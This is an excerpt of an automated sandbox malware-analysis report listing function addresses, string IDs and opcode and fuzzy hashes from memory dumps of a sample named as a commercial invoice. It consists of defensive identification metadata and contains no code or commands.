                                              • API String ID: 0-1949830615
                                              • Opcode ID: d85ce7eaf39970e6e2273654ae6843d1e1122c98640846e54180882e39928b96
                                              • Instruction ID: 1a46d6587a30fefe5c89b599b7f20ae74eef23e403dfd518c86d14e7d54cc95b
                                              • Opcode Fuzzy Hash: d85ce7eaf39970e6e2273654ae6843d1e1122c98640846e54180882e39928b96
                                              • Instruction Fuzzy Hash: 67D1E630B0CA094FE768EF1C94696B5B3D1FFA9370B54027AE44EC7296DE65EC528390
                                              Function 00007FF7C1831750 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +N_^
                                              • API String ID: 0-2642635393
                                              • Opcode ID: b5f2df893fcedee99bbee1ddc7d82d68f4627f6b8cd445c351c8b1f03d30ad4f
                                              • Instruction ID: 6ba04a95f8f51e408517dfeff4856a13152a7de07f01426a76dc51503c0ea10b
                                              • Opcode Fuzzy Hash: b5f2df893fcedee99bbee1ddc7d82d68f4627f6b8cd445c351c8b1f03d30ad4f
                                              • Instruction Fuzzy Hash: C88105B120DA924FD3056B6CBC143D9FBA0FF46366B0842BBC198C6187DE24F92683C5
                                              Function 00007FF7C1831778 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: +N_^
                                              • API String ID: 0-2642635393
                                              • Opcode ID: 4c455d51ac578827f407fa7fb50c661b40eba54a96110a8a94ceed355ac90dab
                                              • Instruction ID: 354cca0bd04d5b54f10914c5dfb332ffe5bdec0c084a9f5d99aed03c05a59b0d
                                              • Opcode Fuzzy Hash: 4c455d51ac578827f407fa7fb50c661b40eba54a96110a8a94ceed355ac90dab
                                              • Instruction Fuzzy Hash: 3C81E5B130DA924FD305676DBC143E9FBA0FF46366B0842BBD198C6187DE24B92683C5
                                              Function 00007FF7C1832780 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L
                                              • API String ID: 0-2909332022
                                              • Opcode ID: 201dacd25e475d44ec9cae422c7b08f12bbb3f00d9ae071882adb356a4d3d409
                                              • Instruction ID: ca94c0ccfe2c65a4a6ff6e0f3a12ed8199412288ef0192b0cf0ca6163101061d
                                              • Opcode Fuzzy Hash: 201dacd25e475d44ec9cae422c7b08f12bbb3f00d9ae071882adb356a4d3d409
                                              • Instruction Fuzzy Hash: 8251D631A1CE064FE768AB1CA419675B3C2EFA8370F54427EE84EC3296DE65A85242C5
                                              Function 00007FF7C1872A40 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Znu
                                              • API String ID: 0-2439342474
                                              • Opcode ID: 90ebcda5ef3a81f8938504849890487945b8bbef1c79f6b18340af236ebc6ad9
                                              • Instruction ID: 1296fe4047d286c9af3d8ac186445868ce21e78d85ad0bc864bbedb1cc445c42
                                              • Opcode Fuzzy Hash: 90ebcda5ef3a81f8938504849890487945b8bbef1c79f6b18340af236ebc6ad9
                                              • Instruction Fuzzy Hash: 8551F431A0DA454FE759BB3C94166B9B7E2FF89371B1442BEE04EC71D3DE2898428781
                                              Function 00007FF7C18327FD Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: d817eff573122311c1a6fb0dac7bbf191f9c589fccc8484788411dbb9cb28f96
                                              • Instruction ID: c21e12cf9e91bee9635f812d3107f7c1ef1a9b05de3652a95b380fa7f0d64c83
                                              • Opcode Fuzzy Hash: d817eff573122311c1a6fb0dac7bbf191f9c589fccc8484788411dbb9cb28f96
                                              • Instruction Fuzzy Hash: 7B519B30A0DA094FE759AF2C9861AB57BD0FF56330B9402BDD44AC7193ED55F84283A0
                                              Function 00007FF7C1833620 Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: qM_H
                                              • API String ID: 0-3483471439
                                              • Opcode ID: 8b1600484897bd3eb937384042d3217242c6516d0017cb3741a48689615542fc
                                              • Instruction ID: 066b3f7cb5ddc7e6134404a150c9fec909ad238cb8d2e0b2231c1042425974e7
                                              • Opcode Fuzzy Hash: 8b1600484897bd3eb937384042d3217242c6516d0017cb3741a48689615542fc
                                              • Instruction Fuzzy Hash: 1D51A27071CE0A8FEB58EB2D94A4775B7D1FF49325B8482B9D00EC7286CE64E852C790
                                              Function 00007FF7C1830925 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Znu
                                              • API String ID: 0-2439342474
                                              • Opcode ID: 1e3299e59a87feca400d091d9a72cd2f69848f6dd69ac184d60ca5ad7233fc9b
                                              • Instruction ID: a2074311d31802c94cfb48d7e2995e7d84206d58f30665f1f57c2e91c6234a4a
                                              • Opcode Fuzzy Hash: 1e3299e59a87feca400d091d9a72cd2f69848f6dd69ac184d60ca5ad7233fc9b
                                              • Instruction Fuzzy Hash: BD217E30A19A8A4FDB84FF28C8956AA77E1FF58310F8045B6E41DC3296DD38E812C751
                                              Function 00007FF7C183AB65 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: yM_L
                                              • API String ID: 0-225993401
                                              • Opcode ID: d8ff61e451d9790db65f86e42f300b5fdb2123ee1815d9765ff447bf8b15d89d
                                              • Instruction ID: d2a2c5dfe2eeaf821c76824b18ba000e58e98bbf6c3c31dcc5902dae0ca356b1
                                              • Opcode Fuzzy Hash: d8ff61e451d9790db65f86e42f300b5fdb2123ee1815d9765ff447bf8b15d89d
                                              • Instruction Fuzzy Hash: 74F08121B1CD1A0B966DBB1874511A9B3D1EF9873079441BED44EC338BDE68AC5242C9
                                              Function 00007FF7C183AA69 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: zM_L
                                              • API String ID: 0-533581143
                                              • Opcode ID: f4f9903416e24f2e7eaf21721b8a6a9adadc8d1344ece6924e1970bd54ef97fd
                                              • Instruction ID: 10f2cfe9869c9efc061f84f9e184b43cfe94b5071dbafbadf829dac5fc8bed26
                                              • Opcode Fuzzy Hash: f4f9903416e24f2e7eaf21721b8a6a9adadc8d1344ece6924e1970bd54ef97fd
                                              • Instruction Fuzzy Hash: C2F0AF21B0CD1A0B966CFA1CA4501B9B3D2EF8833079446BED44EC338ACE68B8534284
                                              Function 00007FF7C1831D48 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !N_
                                              • API String ID: 0-2108449847
                                              • Opcode ID: 5d3c606f275f2271dc9cca9c7c054962b4e2aa8de64b59e3d2da168b1d19593f
                                              • Instruction ID: 538714abc9de091c77cacebe1d51489dc084655c506492c0d4f1ddcc7655fc57
                                              • Opcode Fuzzy Hash: 5d3c606f275f2271dc9cca9c7c054962b4e2aa8de64b59e3d2da168b1d19593f
                                              • Instruction Fuzzy Hash: D6F0C87260E94A4FEB44A36C64561A9F7D1FF963713580277C046CB656DE28F8538341
                                              Function 00007FF7C183A964 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: {M_L
                                              • API String ID: 0-2809244210
                                              • Opcode ID: 3b346e181d26598a78997e791c7b877ec1db4af6ec221e66379baf3d813c3c36
                                              • Instruction ID: 7889a9841e24469b3a51c661bf6e0da45d0631e594e7c68576a487fd707cbc14
                                              • Opcode Fuzzy Hash: 3b346e181d26598a78997e791c7b877ec1db4af6ec221e66379baf3d813c3c36
                                              • Instruction Fuzzy Hash: 45F0AF21B0CD1A4B966CFB1CA4411A9B3D1EF4833079446BED44FC338BDE68B85782C4
                                              Function 00007FF7C1833F65 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: x6nu
                                              • API String ID: 0-1949830615
                                              • Opcode ID: 3bcee83904fb0a3a4de2c9482ea978569d7f754a6334f12b6d0b5c927ed9d1e5
                                              • Instruction ID: b07aa29ae77bd3d3e2b6353341c399358503d45a748b694eb71a6c23781443fa
                                              • Opcode Fuzzy Hash: 3bcee83904fb0a3a4de2c9482ea978569d7f754a6334f12b6d0b5c927ed9d1e5
                                              • Instruction Fuzzy Hash: 2001FB30619A049FCB94EF2CD49596577E2FF9832035906E9E04ACB3A6CE24FC01CB80
                                              Function 00007FF7C184D5B0 Relevance: .7, Instructions: 735COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d81bbbb947a5df8ad61a7b081e635af6040e8b0a6b00513a501694841d5076a3
                                              • Instruction ID: da29f39420c98f7e39004f07eee61d1af11c099ae55b7c555c9d04d6a69474fd
                                              • Opcode Fuzzy Hash: d81bbbb947a5df8ad61a7b081e635af6040e8b0a6b00513a501694841d5076a3
                                              • Instruction Fuzzy Hash: EF229E307099498FDBE4EF2C9468B68B7E2FF9932174542FAD44ECB2A6DE24DC418740
                                              Function 00007FF7C1851890 Relevance: .5, Instructions: 467COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c2415f1c10e5747a6257371aab61b639f5b9e9799332711ba975c0be8fea6824
                                              • Instruction ID: a49a51c9e92e0bff0f8e3abbae2514b4bfc1ab18e681398f00c78505b35b3f89
                                              • Opcode Fuzzy Hash: c2415f1c10e5747a6257371aab61b639f5b9e9799332711ba975c0be8fea6824
                                              • Instruction Fuzzy Hash: F4E1553060CD0A8FEB98EF18D4A0A61B3E2FF99324B6445B9C40DC7696CE75EC92C751
                                              Function 00007FF7C185B148 Relevance: .5, Instructions: 461COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7b219552b4cdc11edf4625aac4791af1985a19ae2426f5d47764faace4349be5
                                              • Instruction ID: 7296b07fba66781c15e754552d80e74541956c006209337c76237c4a5d0c61d1
                                              • Opcode Fuzzy Hash: 7b219552b4cdc11edf4625aac4791af1985a19ae2426f5d47764faace4349be5
                                              • Instruction Fuzzy Hash: DEE1413061CE0A8FEB98EE18C494A71B3E2FF55324B54457DD04EC7686DA35F892C790
                                              Function 00007FF7C18329E8 Relevance: .4, Instructions: 361COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4c8fe6828f4804fa607cdf7443b769e2cbcab46f8828f477f06f840af2c9bb2a
                                              • Instruction ID: 480fded19bd336e32b891cf39c6e68bad1fb918ae4fcbec5de88a6b83e6d864b
                                              • Opcode Fuzzy Hash: 4c8fe6828f4804fa607cdf7443b769e2cbcab46f8828f477f06f840af2c9bb2a
                                              • Instruction Fuzzy Hash: 82A17120B1CE0A8BFFA5BF5854653B4A3C3EF99375BD80179D80DC3286DD59EC2642A0
                                              Function 00007FF7C18327C8 Relevance: .3, Instructions: 346COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 055ffb375fadc19c97499f47d9ab7c4026bb72a0af1c44e6c36be45363b7d2e1
                                              • Instruction ID: 82b518682740df9aa29d88db7a12c2ed9fca8b02f0aabc855ba21a014fd270fb
                                              • Opcode Fuzzy Hash: 055ffb375fadc19c97499f47d9ab7c4026bb72a0af1c44e6c36be45363b7d2e1
                                              • Instruction Fuzzy Hash: 23B13B70A1894D8FDB94EF2CD899BA9B7E2FF59320B4501A9E409D7262CE70E851CB40
                                              Function 00007FF7C1839D56 Relevance: .3, Instructions: 330COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 09b273d1b56c16ac0bc226d0697ec5ceee2d63faf2d9a1064dc6fcd13ec5fd19
                                              • Instruction ID: 99c09424304f897ae94715f1959760d26b498354ce7b04e3e06eba352d464756
                                              • Opcode Fuzzy Hash: 09b273d1b56c16ac0bc226d0697ec5ceee2d63faf2d9a1064dc6fcd13ec5fd19
                                              • Instruction Fuzzy Hash: 2DA12721A0DA894FD786EB388858774BBE1FF96721BCD01FAC04DCB2A3DD18AC558751
                                              Function 00007FF7C1834017 Relevance: .3, Instructions: 319COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bef94d24b9251449e77dc46c854a2d37ce0a3ac7aa8ee1bf74cb694d3b2d8a4
                                              • Instruction ID: 2d74582b04976b02dc36f77ae6c002439a635d35620157a476bd7fb55f0ce8e7
                                              • Opcode Fuzzy Hash: 6bef94d24b9251449e77dc46c854a2d37ce0a3ac7aa8ee1bf74cb694d3b2d8a4
                                              • Instruction Fuzzy Hash: 9BA12F71A18E0A8FDB58FB18D4819A5B3E1FFA831175446AED04BC3696DF34F846CB81
                                              Function 00007FF7C183B11C Relevance: .3, Instructions: 317COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 472b353464bb79abdffbb00c27c502b8fe173f0a9a3d94de3a34127f75a3d328
                                              • Instruction ID: b1b160996d9f0df1cd5f27c716467d58c51d465f70f741a082fbfa3428e326ba
                                              • Opcode Fuzzy Hash: 472b353464bb79abdffbb00c27c502b8fe173f0a9a3d94de3a34127f75a3d328
                                              • Instruction Fuzzy Hash: D4911871A0CA4A4FD349FB2898512F9B7D1EF86334B8443BED48EC7193DD69B8428391
                                              Function 00007FF7C18302E5 Relevance: .3, Instructions: 306COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4591fa09e100827dd159c4a0869d38589919c8907dd0652ff000538af0f92c66
                                              • Instruction ID: 4f1ae713da203979f2c661e1f3758681e08a5bd8ddd181078cf671b887b2213d
                                              • Opcode Fuzzy Hash: 4591fa09e100827dd159c4a0869d38589919c8907dd0652ff000538af0f92c66
                                              • Instruction Fuzzy Hash: B2913A61E0EAC25FE315AA7858261BABFD0EF5377479C41BAC089CB0D3DC49A8568361
                                              Function 00007FF7C1833D3D Relevance: .3, Instructions: 292COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ef5de3a01d6eb8526736794c182b0975f83b2c079037de77c6bb7fc5dfa00eca
                                              • Instruction ID: 973abc91d8ab2a04af8dfef31ab57505800c21b2373fa7d7c7b88b0e0c6456c1
                                              • Opcode Fuzzy Hash: ef5de3a01d6eb8526736794c182b0975f83b2c079037de77c6bb7fc5dfa00eca
                                              • Instruction Fuzzy Hash: 3061C263B0D96617D7107ABCBC557E9E780EF823B7B488277D289C6183CD44744A83E5
                                              Function 00007FF7C185B150 Relevance: .3, Instructions: 263COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 261db014c105946d0c333c3dfe19d278ab4dc71b9298867ab51789d229d80323
                                              • Instruction ID: f4240796569dc5a65b329a4c22ade4ed9d954b874648bf0ec805704135565218
                                              • Opcode Fuzzy Hash: 261db014c105946d0c333c3dfe19d278ab4dc71b9298867ab51789d229d80323
                                              • Instruction Fuzzy Hash: A4815F3061CE098FEB58EF1CC894A71F3E1EB95324B6445B9D04EC7696CA65FC82C7A0
                                              Function 00007FF7C18342DC Relevance: .3, Instructions: 255COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9900239ff5d545dc1b9901001269c95764c5f2607f29a349ece71c118d05936b
                                              • Instruction ID: 062affd40527a1d90a66edb483844da40a07ea4ff06ee0435ce68244f2a0206f
                                              • Opcode Fuzzy Hash: 9900239ff5d545dc1b9901001269c95764c5f2607f29a349ece71c118d05936b
                                              • Instruction Fuzzy Hash: 4781263090EB8A9FD752AB7894516A5BBF0FF46320B8902FAC049C7197CE2C6C56C791
                                              Function 00007FF7C1832B18 Relevance: .2, Instructions: 246COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d874cf0e61cf255a92ceb5589a82739dfb87a1ac00d40fb28bbc6c38947584fe
                                              • Instruction ID: d88898fb51d4bbcfdda3bc4992e47666d8e65170574e5669cf18cc94ad326abb
                                              • Opcode Fuzzy Hash: d874cf0e61cf255a92ceb5589a82739dfb87a1ac00d40fb28bbc6c38947584fe
                                              • Instruction Fuzzy Hash: 1371083060C6499FD709FF2894559B5BBE1EF45330BA401BDD049C72A7CE69BC52C791
                                              Function 00007FF7C183A5D3 Relevance: .2, Instructions: 241COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 391491cfb12238fb5514467d5a9d2ada92e37d3da2debb6bfd37ecf9200e2f59
                                              • Instruction ID: 7714e83f2bc43de684f26ff047c05f36a32c9a4b8ca8f3ecee8a2dc4510e8c70
                                              • Opcode Fuzzy Hash: 391491cfb12238fb5514467d5a9d2ada92e37d3da2debb6bfd37ecf9200e2f59
                                              • Instruction Fuzzy Hash: C571A0A250F6965FD302B77D78A52D9BFA0DF0327E74843F3C0C88A293DD59345A82A5
                                              Function 00007FF7C1832771 Relevance: .2, Instructions: 241COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 905cd43c72f94cca96da27b932a7146f99d209a86372bf36aa152af3c0ff9990
                                              • Instruction ID: 09e74203d5cbff00353295d1e1935a98125d2a6ab88bd96fc42c387117216bb0
                                              • Opcode Fuzzy Hash: 905cd43c72f94cca96da27b932a7146f99d209a86372bf36aa152af3c0ff9990
                                              • Instruction Fuzzy Hash: D861C53020CA098FDB88EF18D459A79B3E1FF99330B5445BDE54EC72A2DE65AC52C780
                                              Function 00007FF7C18327E5 Relevance: .2, Instructions: 232COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e25bcb224638d9bac317c7c92d67ae478f06984bbfec1719b2b4e9a0e1d4c3cd
                                              • Instruction ID: a1104b209f0425e776c6af77b6fd3dccf996d4f3d06055e6dcd7f1d77e532a37
                                              • Opcode Fuzzy Hash: e25bcb224638d9bac317c7c92d67ae478f06984bbfec1719b2b4e9a0e1d4c3cd
                                              • Instruction Fuzzy Hash: C9714B3061C9498FEB94FF2C9468B79B7E2FF59310B4440B9D44ECB2A6DE28EC418791
                                              Function 00007FF7C1941469 Relevance: .2, Instructions: 223COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335798000.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1940000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 960bb449f699db7c25a3239029bea545915c1cae20eba5d5e5a124d2872f6d25
                                              • Instruction ID: 269277d48263d03b0ff6b7dcf5f37a39abb862f5cff6216ad8b657a1ce296dac
                                              • Opcode Fuzzy Hash: 960bb449f699db7c25a3239029bea545915c1cae20eba5d5e5a124d2872f6d25
                                              • Instruction Fuzzy Hash: 6761043090DBC94FDB56EB2488655A5BBF0EF57314B4A01FBC04ACB1E3DE68A805C791
                                              Function 00007FF7C1832B20 Relevance: .2, Instructions: 207COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1335089076.00007FF7C1830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1830000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ff7c1830000_COMMERCIAL INVOICE - BL - AWB 7032805642.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
